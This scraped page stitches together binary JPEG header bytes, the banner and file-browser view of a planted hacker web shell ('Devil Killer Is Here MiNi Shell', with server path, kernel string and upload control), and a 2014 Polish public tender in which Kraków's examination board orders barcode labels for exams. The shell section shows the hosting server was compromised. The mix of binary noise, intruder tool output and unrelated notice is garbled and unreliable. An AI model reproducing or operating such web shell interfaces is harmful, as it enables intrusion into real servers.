JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140211/47766-N-2014.html

<p class="kh_header"><b>Kraków: Etykiety kodowe z nadrukiem 2014</b><br>
<b>Numer ogłoszenia: 47766 - 2014; data zamieszczenia: 11.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowa Komisja Egzaminacyjna w Krakowie , Os. Szkolne 37, 31-978 Kraków, woj. małopolskie, tel. 12 68 32 101,102, faks 12 68 32 100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www,oke.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nadzorowana przez MEN, utworzona na podstawie ustawy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Etykiety kodowe z nadrukiem 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest druk, konfekcjonowanie i dostawa do miejsc wskazanych przez OKE w Krakowie, ok. 4165845 szt.  szt. różnych etykiet samoprzylepnych w tym w większości spersonalizowanych etykiet zadrukowanych kodami kreskowymi do celów identyfikacyjnych arkuszy egzaminacyjnych w egzaminach przeprowadzanych na terenie objętym działaniem OKE 
w Krakowie w 2014 r. (część zamówienia dotyczy również egzaminów zawodowych przeprowadzanych w 2015 r.). 
Numery i odpowiadające im kody kreskowe powinny być wydrukowane na papierowych, półmatowych etykietach samoprzylepnych, na drukarkach termo transferowych o rozdzielczości 300 DPI, lub równoważnych, zapewniających trwałość i jakość nadruku odpowiednią dla późniejszego skanowania.
Dla uzyskania pewności dobrej jakości druku, pozwalającego na bezbłędny odczyt kodu przez skanery, należy zastosować urządzenia do weryfikacji poprawności wydruku kodu kreskowego na etapie wykonania.
Zamawiający sugeruje wykonanie druku etykiet w dwóch rzędach na arkuszach, co ilustruje przykładowy wygląd fragmentu arkusza z etykietami, dla ucznia przystępującego do egzaminu maturalnego, stanowiący załącznik nr 5 do SIWZ. 
Naklejki na banderole należy wykonać na samoprzylepnych materiałach umożliwiających późniejsze wpisanie oznaczeń identyfikacyjnych - wzór arkusza naklejek patrz załącznik nr do 10 SIWZ.

Opis przedmiotu zamówienia dotyczy podanych niżej akcji: 
(Opis dotyczy szacunkowej liczby etykiet ustalonej na dzień sporządzenia SIWZ. W każdym 
z opisanych przypadków Wykonawca ustala ostateczną liczbę etykiet i szkół na podstawie uzyskanych od Zamawiającego baz danych dla poszczególnych akcji, w tym odrębnie dla 
 starego  i   nowego  egzaminu zawodowego.)
 
1.	AKCJA SPRAWDZIAN 
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukiem kodu kreskowego: 
1.1. Dla uczniów: ok. 296000 szt. etykiet o wymiarach 5 x 4 cm na złożonych do wymiaru kopert arkuszach, po 4 szt. etykiet, które otrzyma każdy  z ok. 74000 uczniów przystępujących do sprawdzianu w ok. 3250 szkołach. Ostateczna liczba szkół i uczniów wynika z bazy danych dostarczonej przez Zamawiającego. Każdy z arkuszy  zawierać będzie etykiety z dwoma rodzajami nadruku w tym:
-1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
- 3 etykiety z kodem numerycznym szkoły zdającego, numerem PESEL 
i kodem ucznia oraz odpowiadającymi im kodami kreskowymi.
Uwaga: Etykiety mają być dostarczone w złożonych do wymiaru kopert arkuszach-bez odcinania arkusików dla każdego ucznia.
1.2. Dla szkół: ok. 136500 szt. etykiet o wymiarach 5 x 4 cm na osobnych złożonych do wymiaru kopert arkuszach z 42 szt. etykiet, które przeznaczone są do dyspozycji dyrekcji szkół. Każdy z ok. 3250 arkuszy zawierać będzie etykiety, z nadrukiem wynikającym z tej samej jw. bazy danych Zamawiającego w tym:
  -    1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
- 41 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
1.3. Ok. 3250 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na kopertę/koperty zawierające wyżej opisane etykiety. 

2.	AKCJA GIMNAZJUM
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukiem kodu kreskowego: 
2.1.Dla uczniów: ok. 1129800 szt. etykiet o wymiarach 5 x 4 cm na złożonych do wymiaru kopert  arkuszach, po 14 szt. etykiet, które otrzyma każdy  z ok. 80700 uczniów przystępujących do sześciu części egzaminu gimnazjalnego w ok. 1815 szkołach. Ostateczna liczba szkół i uczniów wynika z bazy danych dostarczonej przez Zamawiającego. Każdy 
z arkuszy zawierać będzie etykiety z dwoma rodzajami nadruku w tym:
-  1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
- 15 etykiet z kodem numerycznym szkoły zdającego, numerem PESEL 
i kodem ucznia oraz odpowiadającymi im kodami kreskowymi. 
Uwaga: Etykiety mają być dostarczone w złożonych do wymiaru kopert arkuszach-bez odcinania arkusików dla każdego ucznia.

2.2. Dla szkół: ok. 16230 szt. etykiet o wymiarach 5 x 4 cm na osobnych złożonych do wymiaru kopert arkuszach z 42 szt. etykiet, które przeznaczone są do dyspozycji dyrekcji szkół. Każdy z ok. 1815 arkuszy zawierać będzie etykiety wykonane z nadrukiem wynikającym 
z tej samej bazy danych Zamawiającego w tym:
- 1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
- 41 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
2.3. Ok. 1815 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na kopertę/koperty zawierające wyżej opisane etykiety. 

Konfekcjonowanie etykiet dla akcji z poz. 1 i 2:
Arkusze etykiet, dla ucznia i szkoły należy zapakować do kopert jednolitego formatu, dla każdej ze szkół oddzielnie i oznaczyć dodatkową etykietą (wydrukowaną jako ostatnia 
z etykiet kodowych danej szkoły, ale o formacie 8 x 6 cm) zawierającą ujawnione dane identyfikacyjne szkoły, tożsame z zawartymi w niej etykietami z kodem kreskowym. Dla większej liczby kopert dla jednej szkoły, należy wprowadzić  oznaczenie liczby kopert, które może mieć postać np. 1z 2, 2 z 2.
-	Koperty pakowane będą w określonej kolejności, zgodnie z numeracją z bazy danych  dostarczonej przez Zamawiającego, do pudeł dostosowanych do zawartości (dobór i zakup pudeł należy do Wykonawcy zamówienia). Pudła należy opisać danymi adresowymi Punktu Odbioru Prac i ewentualnie numerem kolejnym, gdy będzie więcej pudeł dla tego samego POP-u (dla 2 pudeł oznaczenie może mieć postać 1 z 2, 2 z 2).
- 	Pudła z kopertami należy dostarczyć na koszt Wykonawcy do wskazanych przez Zamawiającego miejsc w nieprzekraczalnym terminie wykonania zamówienia. (Wstępne dane adresowe dla 67 POP-ów sprawdzianu i egzaminu gimnazjalnego zawiera załącznik nr 8 do SIWZ ark.1). 
Realizacja każdej dostawy musi być potwierdzona pisemnie przez odbierającego i zawierać miejsce, datę i godzinę odbioru jak również dane osobowe odbierającego. Dotyczy to  również przypadków gdy dostawa etykiet zlecana jest podwykonawcom. 
W kalkulacji ceny etykiet dla sprawdzianu i egzaminu gimnazjalnego należy uwzględnić wysyłkę  etykiet do 67 POP-ów.
Uwaga: Wykonawca zobowiązany jest używać do pakowania etykiet materiały o właściwej jakości i wystarczającej trwałości. Przypadki uszkodzenia kopert (w czasie transportu i przed ich przekazaniem szkołom) z powodu ich niewłaściwej jakości podlegać będą reklamacjom.

Termin wymagany wykonania zamówienia dla sprawdzianu i egzaminu gimnazjalnego wg punktu 1 i 2 jw.: - 13 marzec 2014 r. - rozumiany jako termin dostarczenia etykiet do miejsca przeznaczenia (w dniu 17-03-2014 r. etykiety kodowe dla sprawdzianu i egzaminu gimnazjalnego muszą być dostępne w 67 POP-ach do przekazywania szkołom). 

3.	AKCJA MATURA  
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukami kodu kreskowego: 
3.1. Dla uczniów : ok. 1740000 szt. etykiet o wymiarach 5 x 4 cm na arkuszach, po 20 szt., które otrzyma każdy z ok. 87000 uczniów przystępujący do egzaminu maturalnego, w ok. 1330 szkołach ponadgimnazjalnych. Ostateczna liczba szkół i uczniów wynika z bazy danych dostarczonej przez Zamawiającego. Każdy z arkuszy zawierać będzie etykiety z dwoma rodzajami nadruku w tym:
- 1 etykieta z imieniem, nazwiskiem i numerem PESEL zdającego,
- 19 etykiet z kodem numerycznym szkoły zdającego, numerem PESEL 
i kodem ucznia oraz odpowiadającymi im kodami kreskowymi.
Uwaga: Etykiety mają być dostarczone w złożonych do wymiaru kopert arkuszach - odcięte 20 szt. dla każdego ucznia.

3.2. Dla szkół: ok. 130340 szt. etykiet o wymiarach 5 x 4 cm na osobnych arkuszach po 98 szt. etykiet, które przeznaczone są do dyspozycji dyrekcji  1330 szkół. Arkusze zawierać będą etykiety z nadrukiem wynikającym z tej samej bazy danych Zamawiającego w tym:
- 1 etykieta z ujawnionymi danymi identyfikującymi szkołę,
- 97 etykiet z kodem numerycznym szkoły i odpowiadającym mu kodem kreskowym. 
3.3.	Ok. 1330 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na koperty zawierające wyżej opisane etykiety. 

Konfekcjonowanie etykiet dla akcji z poz. 3:
Arkusze  etykiet  dla ucznia i szkoły należy zapakować do kopert jednolitego formatu, dla każdej ze szkół oddzielnie i oznaczyć dodatkową etykietą (wydrukowaną jako ostatnia z etykiet kodowych danej szkoły, ale o formacie 8 x 6 cm) zawierającą ujawnione dane identyfikacyjne szkoły, tożsame z zawartymi w niej etykietami z kodem kreskowym. Dla większej liczby kopert dla jednej szkoły, należy wprowadzić  oznaczenie liczby kopert, które może mieć postać np. 1z 2, 2 z 2.
-	Koperty pakowane będą w określonej kolejności, zgodnie z numeracją z bazy danych  dostarczonej przez Zamawiającego, do pudeł dostosowanych do zawartości (dobór i zakup pudeł należy do Wykonawcy zamówienia). Pudła należy opisać danymi adresowymi Punktu Odbioru Prac i ewentualnie numerem kolejnym, gdy będzie więcej pudeł dla tego samego POP-u (dla 2 pudeł oznaczenie może mieć postać 1 z 2, 2 z 2).
- 	Pudła z kopertami należy dostarczyć na koszt Wykonawcy do wskazanych przez Zamawiającego miejsc w nieprzekraczalnym terminie określonym poniżej. (Wstępne dane adresowe dla 62 POP-ów maturalnych zawiera załącznik nr 8 do SIWZ ark. 2). 
Realizacja każdej dostawy musi być potwierdzona pisemnie przez odbierającego i zawierać miejsce, datę i godzinę odbioru jak również dane osobowe odbierającego. Dotyczy to  również przypadków gdy dostawa etykiet zlecana jest firmom kurierskim. 
W kalkulacji ceny etykiet dla egzaminu maturalnego należy uwzględnić wysyłkę  etykiet do 62 POP-ów. 

Uwaga: Wykonawca zobowiązany jest używać do pakowania etykiet materiały o właściwej jakości i wystarczającej trwałości. Przypadki uszkodzenia kopert (w czasie transportu i przed ich przekazaniem szkołom) z powodu ich niewłaściwej jakości podlegać będą reklamacjom.
Termin wykonania zamówienia dla egzaminu maturalnego:  - 25 kwiecień 2014 r. -rozumiany jako termin dostarczenia etykiet do miejsca przeznaczenia (w dniu 29-04-2014 r. etykiety kodowe dla egzaminu maturalnego muszą być dostępne w 62 POP-ach do przekazywania szkołom).
4.	AKCJA EGZAMIN ZAWODOWY 
Druk konfekcjonowanie i dostawa etykiet samoprzylepnych z nadrukami kodu kreskowego dla etapu pisemnego i praktycznego egzaminów zawodowych:
	(Podane niżej liczby szt. etykiet do wykonania dotyczą sesji letniej i zimowej egzaminu 	zawodowego - stary egzamin, oraz planowanych sesji egzaminu potwierdzającego 	kwalifikacje w zawodzie - nowy egzamin. Ostateczna liczba szkół i uczniów wyniknie 
	z baz danych dostarczonych przez Zamawiającego, innych dla starego i nowego egzaminu 	w kolejnych sesjach.)
4.1. Dla uczniów: ok. 543000 szt. etykiet o wymiarach 5 x 4 cm na arkuszach:
- po 2 szt., dla etapu pisemnego egzaminu w tym:
- 1 etykieta z imieniem i nazwiskiem zdającego, nr PESEL, i numerem kodu zawodu (dane zdającego ujawnione)
- 1 szt. z kodem numerycznym szkoły, numerem PESEL z numerem kodu zawodu oraz odpowiadającymi im kodami kreskowymi i napisem - OKE Kraków -,

- po 4 szt. dla etapu praktycznego egzaminu w tym:
- 1 etykieta z imieniem i nazwiskiem zdającego, nr PESEL, i numerem kodu zawodu (dane zdającego ujawnione)
- 3 szt. z kodem numerycznym ośrodka, numerem PESEL z numerem kodu zawodu oraz odpowiadającymi im kodami kreskowymi i napisem - OKE Kraków -,
które otrzyma każdy z ok. 90500 uczniów przystępujący do przeprowadzanych egzaminów zawodowych w ok. 3180 szkołach zawodowych i ośrodkach egzaminacyjnych.
Uwaga: Etykiety mają być dostarczone w arkuszach złożonych do formatu koperty bez odcinania ich dla każdego ucznia. 		
 
4.2. Dla szkół i ośrodków: ok. 63600 szt. etykiet o wymiarach 5 x 4 cm na osobnych arkuszach po 20 szt., które przeznaczone są dla dyrekcji szkół. Każdy z ok. 3180 arkuszy zawierać będzie etykiety z  numerem i kodem kreskowym szkoły lub ośrodka w tym:
- 1 etykieta z ujawnionymi danymi identyfikującymi szkołę lub ośrodek,
- 19 etykiet z kodem numerycznym szkoły lub ośrodka i odpowiadającym mu kodem kreskowym i napisem - OKE Kraków -.

4.3. Ok. 3180 szt. etykiet adresowych szkół o wymiarach 8 x 6 cm do naklejania na koperty 
z zawartością etykiet, opisanych wyżej.
Uwaga: Na etykietach dla egzaminu zawodowego napis o treści - OKE Kraków- należy umieścić w dowolnym miejscu etykiety.		

Konfekcjonowanie etykiet dla akcji z poz. 4:
Arkusze etykiet, dla ucznia i szkoły należy zapakować do kopert jednolitego formatu, dla każdej ze szkół oddzielnie i oznaczyć dodatkową etykietą (wydrukowaną jako ostatnia z etykiet kodowych danej szkoły, ale o formacie 8 x 6 cm). Całość materiałów tego zadania zapakowana, zgodnie z numeracją z odpowiedniej dla danej sesji bazy danych dostarczonej przez Zamawiającego, do pudeł (dobór i zakup pudeł należy do Wykonawcy zamówienia) dostarczona zostanie do POP-ów, szkół, zespołów szkół lub ośrodków egzaminacyjnych w zależności od sesji. Koperty przeznaczone dla szkół i ośrodków, które posiadają wspólny adres wskazujący, że jest to zespół szkół, należy dostarczyć w jednej przesyłce. 
Koperty zbiorcze przeznaczone dla każdej ze szkół należy dodatkowo wyraźnie opisać  STARY EGZAMIN  lub  NOWY EGZAMIN  w zależności od tego czy naklejki w nich zawarte przeznaczone są dla starego, czy nowego egzaminu zawodowego, zgodnie z odrębnymi bazami danych dostarczonymi przez Zamawiającego.
W kalkulacji ceny etykiet dla egzaminu zawodowego należy uwzględnić wysyłkę  etykiet do 62 POP-ów (tożsamych z POP - maturalnymi) dla starego egzaminu zawodowego sesji letniej 2014 r., - koperty oznaczyć STARY EGZAMIN  i dla nowego egzaminu zawodowego  - koperty oznaczyć NOWY EGZAMIN, oraz wysyłkę do ok. 680 szkół lub ośrodków 
w pozostałych sesjach egzaminu zawodowego - patrz tabela w pkt. VII SIWZ.

Uwaga: Wykonawca zobowiązany jest używać do pakowania etykiet materiały o właściwej jakości i wystarczającej trwałości. Przypadki uszkodzenia kopert w czasie transportu i przed ich przekazaniem szkołom z powodu ich niewłaściwej jakości podlegać będą reklamacjom.

Realizacja każdej dostawy musi być potwierdzona pisemnie przez odbierającego i zawierać miejsce, datę i godzinę odbioru jak również dane osobowe odbierającego. Dotyczy to  również przypadków gdy dostawa etykiet zlecana jest firmom kurierskim. 

Termin wykonania zamówienia dla egzaminów zawodowych:  
- STARY i NOWY egzamin zawodowy sesji letniej - 21-05-2014 - r.  (w tym dniu etykiety kodowe dla egzaminu zawodowego muszą być dostępne w 62 POP-ach do przekazywania szkołom),
- NOWY egzamin sesji sierpień-październik - 04-08-2014 r.
- NOWY egzamin sesji zimowej - III dekada grudnia 2014 r.
- STARY egzamin sesji zimowej- III dekada grudnia 2014 r. 
Uwaga: Ostateczne ustalenie terminów wykonania i sposobu konfekcjonowania, 
w przypadku konieczności dokonania takich zmian, może nastąpić po przekazaniu przez Zamawiającego bazy danych do druku w postaci elektronicznej, na minimum 7 dni przed wymaganym terminem dostawy, lub w obustronnie ustalonym terminie, niezwłocznie po podpisaniu umowy.

5. NAKLEJKI NA BANDEROLE
Druk i konfekcjonowanie naklejek samoprzylepnych o wymiarach nie mniejszych niż 6,9 x 3,7 cm do naklejania na banderole. Naklejki należy wykonać z nadrukiem wg wzoru stanowiącego załącznik nr 10 do SIWZ na materiałach umożliwiających późniejsze odręczne 
i czytelne wpisywanie oznaczeń identyfikacyjnych. 

Konfekcjonowanie naklejek na banderole:
1700 szt. zestawów naklejek na banderole należy konfekcjonować po 24 szt. w zestawie. Opakowania zbiorcze powinno zabezpieczać naklejki przed zniszczeniem w czasie transportu. Format arkusza/zestawu z naklejkami powinien  odpowiadać wymiarowi formatu A4 - 
w przypadku drukowania w 2 rzędach zestaw 24 szt. naklejek należy złożyć do formatu umożliwiającego włożenie do koperty formatu A4. 

Termin wykonania naklejek na banderole:
13 marca 2014 r.- rozumiany jako data jednorazowej dostawy do siedziby OKE w Krakowie 1700 szt. arkuszy po 24 szt. naklejek.

W ramach zamówienia Wykonawca zobowiązany będzie wykonać - o ile zaistnieje taka potrzeba - etykiety kodowe przeznaczone dla uczniów przystępujących do egzaminów 
w dodatkowych terminach, jak również dodrukować etykiety, których nie wydrukowano 
w terminach określonych w SIWZ.
W przypadku jakichkolwiek uchybień w wykonaniu zamówienia, które skutkowałyby zakłóceniem toku egzaminów przeprowadzanych z użyciem opisanych wyżej etykiet kodowych, Zamawiający zastrzega sobie możliwość wystąpienia z roszczeniem o stosowne odszkodowanie. 

Wykonawca zobowiązany jest do przestrzegania obowiązujących przepisów prawa 
w zakresie ochrony danych osobowych i niewykorzystywania uzyskanej od Zamawiającego bazy danych do innych celów niż wydruk etykiet kodowych..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających na druk i dostawę etykiet kodowych w przypadku wystąpienia dodatkowego zapotrzebowania o wartości do 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.61-2, 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowych warunków do spełnienia w tym zakresie. Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia Zamawiający, żąda by Wykonawca wykazał, iż wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 3 usługi drukowania i dostawy etykiet kodowych, przy uzyskaniu przychodu ze świadczenia takich usług w łącznej wysokości nie mniejszej niż 60000 zł brutto w tym okresie (przykładowo: wykonanie w okresie 3 lat w każdym z kolejnych lat jednej usługi za nie mniej niż 20 000 zł brutto każda, stanowi o spełnieniu wymaganego warunku).
Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 6 do SIWZ oraz złożonego na potwierdzenie spełnienia tego warunku wykazu wykonanych usług wg załącznika nr 4 do SIWZ wraz z załączonymi dowodami czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowych warunków do spełnienia w tym zakresie. Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowych warunków do spełnienia w tym zakresie. Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowych warunków do spełnienia w tym zakresie. Weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 6 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

